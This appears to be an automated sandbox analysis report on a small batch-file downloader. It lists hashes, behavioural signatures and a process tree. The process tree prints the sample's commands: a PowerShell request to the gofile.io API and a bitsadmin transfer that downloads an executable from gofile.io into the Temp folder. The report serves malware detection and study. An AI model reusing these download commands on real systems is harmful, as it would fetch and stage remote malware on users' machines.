Analysis
-
max time kernel
104s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
26/03/2025, 23:31
Static task
static1
Behavioral task
behavioral1
Sample
Downloader.bat
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
Downloader.bat
-
Size
564B
-
MD5
e9425888abbdf846bcee0d7ee271e526
-
SHA1
76e4f8a62ce5a0295347b423930f2b6c1bae955a
-
SHA256
56fba807f509d7e6caea93447bfa9746ca0332a23216936598849b049a49c65d
-
SHA512
647e9ad95d3cdd180fcb383195d8bc4f708bfad10251232ec01333d1e94e696f5d7e987ea8160790f134ae6f7893d0a5467848a4ee94f21b4ba4e264d2dd6853
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 864 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5288 bitsadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 3 api.gofile.io 4 api.gofile.io -
pid Process 864 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 864 powershell.exe 864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 864 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5920 wrote to memory of 5548 5920 cmd.exe 87 PID 5920 wrote to memory of 5548 5920 cmd.exe 87 PID 5548 wrote to memory of 864 5548 cmd.exe 88 PID 5548 wrote to memory of 864 5548 cmd.exe 88 PID 5920 wrote to memory of 5288 5920 cmd.exe 92 PID 5920 wrote to memory of 5288 5920 cmd.exe 92
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Downloader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "(Invoke-RestMethod 'https://api.gofile.io/getServer').data.server"2⤵
- Suspicious use of WriteProcessMemory
PID:5548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(Invoke-RestMethod 'https://api.gofile.io/getServer').data.server"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer gofiledownload /download /priority normal "https://+.gofile.io/download/d38nvZ" "C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe"2⤵
- Download via BitsAdmin
PID:5288
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82